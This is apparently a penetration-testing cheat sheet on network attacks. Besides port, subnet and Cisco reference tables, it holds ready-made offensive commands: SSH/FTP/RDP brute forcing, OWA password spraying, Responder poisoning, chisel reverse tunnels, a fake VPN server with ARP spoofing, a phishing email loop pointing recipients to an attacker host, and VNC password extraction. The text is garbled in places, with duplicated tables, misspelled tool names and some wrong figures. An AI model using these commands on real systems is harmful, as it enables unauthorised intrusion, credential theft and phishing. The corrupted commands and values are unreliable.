Network

Common ports

No Service
21	FTP
22	SSH
23 Tel net
25	SMTP
49	TACACS
53 DNS
8/67 DHCP (UDP)
69 TFTP (UDP)
80	HTTP
88 Kerberos
110	POP3
111 RPC
123 NTP (UDP)
135	Windows RPC
137 NetBIOS
138	NetBIOS
139	SMB
143 IMAP
161 SNMP (UDP)
179	BGP
201 Apple Talk
389 LDAP
443 HTTPS
445	SMB
500	ISAKMP (UDP)
514 Syslog
520	R.I.P
7/546 DHCPv6
587 SMTP
902 VMware
1080	Socks Proxy
1194	VPN
1433/4 MS-SQL
1521	Oracle
1629	DarneWare
2049	NFS
3128	Squid Proxy
3306	MySQL
3389	RDP
5060	SIP
5222	Jabber
5432	Postgres
5666	Nagios
5900	VNC
6000	X11
6129	DameWare
6667	IRC
9001	Tor
9001	HSQL
9090/1 Open fire
9100	Jet Direct

No Service

FTP

SSH

23 Tel net

SMTP

TACACS

53 DNS

8/67 DHCP (UDP)

69 TFTP (UDP)

HTTP

88 Kerberos

110

POP3

111 RPC

123 NTP (UDP)

135

Windows RPC

137 NetBIOS

138

NetBIOS

139

SMB

143 IMAP

161 SNMP (UDP)

179

BGP

201 Apple Talk

389 LDAP

443 HTTPS

445

SMB

500

ISAKMP (UDP)

514 Syslog

520

R.I.P

7/546 DHCPv6

587 SMTP

902 VMware

1080

Socks Proxy

1194

VPN

1433/4 MS-SQL

1521

Oracle

1629

DarneWare

2049

NFS

3128

Squid Proxy

3306

MySQL

3389

RDP

5060

SIP

5222

Jabber

5432

Postgres

5666

Nagios

5900

VNC

6000

X11

6129

DameWare

6667

IRC

9001

Tor

9001

HSQL

9090/1 Open fire

9100

Jet Direct

Get operating system information with TTL

os	size
Windows	128
Linux	64
	255
Solaris	255

ftp status codes

situation	code
Waiting for user login 220
Not authenticated 530

situation

code

Waiting for user login 220

Not authenticated 530

http status codes

situation	code
Successful connection 200
Lack of access 403

situation

code

Successful connection 200

Lack of access 403

IPV4 information

Classful range

name	start	end
A 0.0.0.0	127.255.255.255
B 128.0.0.0	191.255.255.255
C	192.0.0.0	223.255.255.255
D 224.0.0.0	239.255.255.255
E	240.0.0.0	255.255.255.255

Range Reversed

start	end
10.0.0.0	10.255.255.255
127.0.0.0	127.255.255.255
172.16.0.0	172.31.255.255
192.168.0.0	192.168.255.255

Subnetting

/31

255.255.255.254

1 Host

/30

255.255.255.252

2 Hosts

/29

255.255.255.248

6 Hosts

/28

255.255.255.240

14 Hosts

/27

255.255.255.224

30 Hosts

/26

255.255.255.192

62 Hosts

/25

255.255.255.128

126 Hosts

/24

255.255.255.0

254 Hosts

/23

255.255.254.0

510 Hosts

/22

255.255.252.0

1022 Hosts

/21

255.255.248.0

2046 Hosts

/20

255.255.240.0

4096 Hosts

/19

255.255.224.0

8190 Hosts

/18

255.255.192.0

16382 Hosts

/17

255.255.128.0

32766 Hosts

/16

255.255.0.0

65534 Hosts

/15

255.254.0.0

131070 Hosts

/14

255.252.0.0

262142 Hosts

/13

255.248.0.0

524286 Hosts

/12

255.240.0.0

1048574 Hosts

/11

255.224.0.0

2097150 Host

/10

255.192.0.0

4194302 Host

255.128.0.0

8388606 Host

255.0.0.0

16777214 Hosts

Calculate the subnet range

Given: 1.1.1.101/28
/28 = 255.255.255.240 netmask
256 - 240 = 16 = subnet ranges of 16, i.e.
    1.1.1.0
    1.1.1.16
    1.1.1.32 ...
Range where given IP falls: 1.1.1.96 - 1.1.1.111

IPV6 information

Broadcast addresses

ff02::1 - link-local nodes
ff05::1 - site-local nodes
ff01::2 - node-local routers
ff02::2 - link-local routers
ff05::2 - site-local routers

Interface addresses

fe80:: -link-local
2001:: - routable
::a.b.c.d- IPv4 compatible IPv6
::ffff:a.b.c.d- IPv4 mapped IPv6

ipv6 toolbox

Remote Network DoS:
rsumrf6 eth# remote ipv6

port forward with chisel

./chisel server -p 9000 --reverse
./chisel client <ip>:9000 R:4500:127.0.0.1:4500

./chisel server -p 9000 --reverse
./chisel client <ip>:9000 R:socks

ipv6 tunnel in ipv4 with socat

socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[2001::]:80
./nikto.pl -host 12-.0.0.1 -port 8080

Cisco commands

Command	Description
enable	Enable privilege mode
#configure terminal	interface settings
(config)#interface fa0/0	Configure FastEthernet 0/0
(config-if)#ip addr 1.1.1.1 255.255.255.0	Set IP to fa0/0
(config)#line Vty 0 4	set vty line
(config-line)#login	Set telnet password
(config-line)#password password	Set password for telnet
#show session	reopen session
#show version	IOS version
#dir file systems	Available files
#dir all-filesystems	File Information
#dir /all	Delete files
#show running-config	settings in memory
#show startup-config	Settings inside boot
#show ip interface brief	List of Interfaces
#show interface e0	interface information details
#show ip route	List of Routes
#show access-lists	Access Lists
#terminal length 0	No limit on output
#copy running-config startup-config	Place settings from memory to boot
#copy running-config tftp	Copy settings on tftp

Command

Description

enable

Enable privilege mode

#configure terminal

interface settings

(config)#interface fa0/0

Configure FastEthernet 0/0

(config-if)#ip addr 1.1.1.1 255.255.255.0

Set IP to fa0/0

(config)#line Vty 0 4

set vty line

(config-line)#login

Set telnet password

(config-line)#password password

Set password for telnet

#show session

reopen session

#show version

IOS version

#dir file systems

Available files

#dir all-filesystems

File Information

#dir /all

Delete files

#show running-config

settings in memory

#show startup-config

Settings inside boot

#show ip interface brief

List of Interfaces

#show interface e0

interface information details

#show ip route

List of Routes

#show access-lists

Access Lists

#terminal length 0

No limit on output

#copy running-config startup-config

Place settings from memory to boot

#copy running-config tftp

Copy settings on tftp

IOS 11.2-12.2 vulnerabilities

http:// ip /level/ 16-99 /exec/show/config

SVN

List of files and folders

svn list svn://10.10.10.10/Empty/

activity reports

svn log svn://10.10.10.10/

change list

svn diff -c r2 svn://10.10.10.10

Guess the password of OVA, O365, skype business

python3 atomizer.py owa 10.10.10.10 pass.txt user.txt -i 0:0:01

SNMP protocol

Need to start the tftp service

./snmpblow.pl -s srcip -d rtr_ip -t attackerip -f out.txt
snmpstrings.txt

Windows executive services list

snrnpwalk -c public -v1 ip 1 | grep hrSWRJnName | cut -d" " -f4

Windows open ports

smpwalk | grep tcpConnState | cut -d" " -f6 | sort-u

Installed software

smpwalk | grep hrSWInstalledName

Windows users

snmpwalk ip 1.3 | grep 77.1.2.25 -f4

Shared files

snmpwalk -v 1 -c public 10.13.37.10

Listening with responder

responder -I eth1 -v

Packet recording

Recording of port packets 22-23

tcpdump -nvvX -sO -i eth0 tcp portrange 22-23

Capture specific ip traffic other than subnet

tcpdump -I eth0 -tttt dst ip and not net 1.1.1.0/24

Traffic recording 192.1

tcpdump net 192.1.1

Timed recording of traffic

dumpcap -I eth0 -a duration: sec -w file file.pcap

Check Reply PCAP

file2cable -i eth0 -f file.pcap

Checking Reply packets (FUZZ | Dos)

tcpreplay --topspeed --loop=O --intf=eth0 .pcap_file_to replay rnbps=10|100|1000

DNSRecon command

Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Retrieve standard DNS records:
./dnsrecon.rb -t std -d domain.corn
Enumerate suborders:
./dnsrecon.rb -t brt -d domain.corn -w hosts.txt
DNS zone transfer:
./dnsrecon -d domain.corn -t axfr

reverse dns lookup operation and checking the output with nmap

nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2"
"$3)=="Nmap scan report")print$5" "$6}' | sed 's/(//g' I sed 's/)//g'
dns.txt

VPN

Write psk on the file

ike-scan -M -A vpn ip -P file

attack vpn server

ike-scan -A -t 1 --sourceip= spoof ip dst ip

Fiked - Create fake vpn server

Must know the VPN group name a~d pre-shared key;
1. Ettercap filter to drop IPSEC traffic (UDP port 500)
   if(ip.proto == UDP && udp.scc == 500) {
      kill();
      drop();
      msg (" UDP packet dropped ") ;
2. Compile filter
   etterfilter udpdrop.filter -o udpdrop.ef
3. Start Ettercap and drop all IPSEC ~raffic
   #ettercap -T -g -M arp -F udpdrop.ef // //
4. Enable IP Forward
   echo "1" /proc/sys/net/ipv4/ip_forward
5. Configure IPtables to port forward to Fiked server
    iptables -t nat -A PREROUTING -p udp -I eth0 -d VPN Server IP -j
   DNAT - - to Attacking Host IP
    iptables -P FORWARD ACCEP~
6. Start Fiked to impersonate the VPN Server
   fiked - g vpn gatewa; ip - k VPN Group Name:Group Pre-Shared Ke;
7. Stop Ettercap
8. Restart Ettercap without the filter
   ettercap -T -M arp II II

Guess username with hydra

hydra -L ~/seclists/Usernames/Names/femalenames-usa-top1000.txt -p Welcome123! IP PROTOCOL

Display smb paths with smbclient

smbclient -U USERNAME -L IP

Accessing the system environment using WRM

ruby evil-winrm.rb -u USER -p PASS -i IP

Directing local traffic to a specified address

simpleproxy -L 8000 -R 10.10.10.10:1337

Putty software

Registry key to report any operation by putty (even commands and outputs)

[HKEY_CURRENT_USER\Software\Si~onTatham\Putt;\Sessions\Default%20Settings]
"LogFileName"="%TEMP%\putty.dat"
"LogType"=dword:00000002"

ldap

Search for important ldap information using impackt

ldapsearch -h <host> -x -b "dc=<dc>,dc=local"

Display all ldap structural information

ldapsearch -x -LLL -w PASSWORD

#ftp

Connect to ftp with username and password

lftp -e 'set ssl:verify-certificate false' -u "user,pass" -p 21 10.10.10.10

Printers

Establish connection

python pret.py 10.10.10.10 pjl

Email sending and smtp password guessing

1.
nc -lvnp 80

2.
while reading mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials /
Errors" --body "goto http://10.10.10.19/" --server 10.10.10.10; done < mails.txt

vnc

Decode the VNC Install.reg file

vncpwd.exe <ENCRYPTEDPASSWORD>

RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password

TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
HKLM\SOFTWARE\TightVNC\Server\ControlPassword

tightvnc.ini
vnc_viewer.ini
Value: Password or PasswordViewOnly

TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password

UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2

more info

##CCTV

Data collection

nmap -Pn -sV --script "rtsp-*" -p 554 10.10.10.10/24

Guess the password

rtspbrute -t ip.txt -p 554

Jack of all trades

docker run -t ullaakut/cameradar -t 192.168.100.0/24

SSH

connect to SSH service on the target

ssh <target>

scan for open SSH port on the target

nmap -p 22 <target> -

brute force SSH login

hydra -L users.txt -P passwords.txt ssh://<target> -

80 (HTTP)

retrieve content from the HTTP server on the target

curl http://<target> -

scan for open HTTP port on the target

nmap -p 80 <target>

directory enumeration on the HTTP server

dirb http://<target>

443 (HTTPS)

retrieve content from the HTTPS server on the target

curl https://<target>

scan for open HTTPS port on the target

nmap -p 443 <target>

perform SSL/TLS vulnerability scan on HTTPS server

sslscan <target>:443

21 (FTP)

connect to FTP service on the target

ftp <target>

scan for open FTP port on the target

nmap -p 21 <target>

brute force FTP login

hydra -l <username> -P passwords.txt ftp://<target>

25 (SMTP)

connect to SMTP service on the target

telnet <target> 25

scan for open SMTP port on the target

nmap -p 25 <target>

enumerate valid users on SMTP server

smtp-user-enum -M VRFY -U users.txt -t <target>

53 (DNS)

perform DNS lookup on the target

nslookup <target>

scan for open DNS port on the target

nmap -p 53 <target>

perform DNS enumeration on the target

dnsrecon -d <target>

110 (POP3)

connect to POP3 service on the target

telnet <target> 110

scan for open POP3 port on the target

nmap -p 110 <target>

brute force POP3 login

hydra -l <username> -P passwords.txt pop3://<target>

143 (IMAP)

connect to IMAP service on the target

telnet <target> 143

scan for open IMAP port on the target

nmap -p 143 <target> -

brute force IMAP login

hydra -l <username> -P passwords.txt imap://<target> -

3306 (MySQL)

connect to MySQL service on the target

mysql -h <target> -u <username> -p

scan for open MySQL port on the target

nmap -p 3306 <target>

perform SQL injection on MySQL database

sqlmap -u "http://<target>/index.php?id=1" --dbs

3389 (RDP)

connect to RDP service on the target

rdesktop <target>

scan for open RDP port on the target

nmap -p 3389 <target>

brute force RDP login

crowbar -b rdp -s <target>/32 -u users.txt -C passwords.txt

5900 (VNC remote desktop)

connect to VNC service on the target

vncviewer <target>

nmap -p 5900 <target>

PreviousWindows NextTips and Tricks

Last updated 6 months ago